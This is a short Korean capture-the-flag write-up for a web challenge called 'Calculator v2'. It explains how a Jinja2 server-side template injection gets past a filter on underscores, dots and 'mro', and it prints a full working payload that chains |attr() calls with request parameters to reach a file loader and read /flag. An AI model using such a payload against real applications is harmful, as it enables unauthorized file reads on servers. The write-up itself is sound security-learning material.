[Web Hacking] Calculator v2

0x01 문제 설명

이전 Calculator 문제와 이어지는 버전의 문제다. 설명에 따르면 취약점을 방어하는 코드를 추가 하였다는 것을 알 수 있다.

---

0x02 풀이 과정

_ , . , mro 등 과 같은 문자들이 추가로 필터링 되고있다. 이전 문제와 같이 fileloader를 이용하여 /flag 를 읽어올 예정이다. SSTI 공격을 수행하는 과정은 Calculator 에서 다뤘기에, 이번에 사용한 필터링 우회에 관해서만 이야기해 볼 것이다.

. 필터링 우회
A.B -> A|attr('B')

특정 문자 필터링 우회
__class__
data=request.form.get('a')&a=__class__

위와같은 방식으로 ''.class.mro[1].subclasses()[99].get_data('/flag') 를 우회한 결과는 아래와 같다.

data=''|attr(request|attr('form')|attr('get')('a'))|attr(request|attr('form')|attr('get')('b'))|attr(request|attr('form')|attr('get')('c'))(1)|attr(request|attr('form')|attr('get')('d'))()|attr('pop')(99)(request|attr('form')|attr('get')('e'),request|attr('form')|attr('get')('e'))|attr(request|attr('form')|attr('get')('f'))(request|attr('form')|attr('get')('e'))&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__&e=flag&f=get_data

가독성이 심히 떨어지지만, 실제로는 그리 복잡하지 않다.

---

0x03 결과 확인

• FLAG
• H4CGM{asdfasdfasdfasdfasdfasdf}

 

---

0x04 회고 및 참고 내용

필터링을 하나하나 우회하는 과정은 늘 흥미롭게 느낀다.

참고

https://dohunny.tistory.com/20

https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.html?highlight=ssti#jinja2-ssti

https://kortsec1n4mationm.tistory.com/49

https://kortsec1n4mationm.tistory.com/46